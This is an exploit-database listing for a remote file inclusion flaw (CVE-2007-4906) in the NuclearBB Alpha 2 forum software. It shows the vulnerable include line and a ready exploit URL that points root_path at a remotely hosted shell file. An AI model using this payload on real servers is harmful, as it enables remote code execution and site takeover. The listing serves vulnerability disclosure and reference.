[] NeoSense
E X P L O I T S
title author type platform port cve id

NuclearBB Alpha 2 - 'ROOT_PATH' Remote File Inclusion

Author: Rootshell Security
type: webapps
platform: php
port: 
date_added: 2007-09-10 
date_updated: 2016-10-12 
verified: 1 
codes: OSVDB-38978;CVE-2007-4906 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comNuclearBB_Alpha_2.zip
Vuln Product: NuclearBB Alpha 2
Vendor: http://www.nuclearbb.com/
Vulnerability Type: Remote File Inclusion
Autor: Infection
Team: Rootshell Security Team
Vulnerable file: /NuclearBB/tasks/send_queued_emails.php
Exploit URL: http://localhost/NuclearBB/tasks/send_queued_emails.php?root_path=http://localhost/shell.txt?
Method: get
Register_globals: On
Vulnerable variable: root_path
Line number: 14
Lines:
----------------------------------------------
require("$root_path/inc/functions_email.php");
$mail = new email;
----------------------------------------------

# milw0rm.com [2007-09-11]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.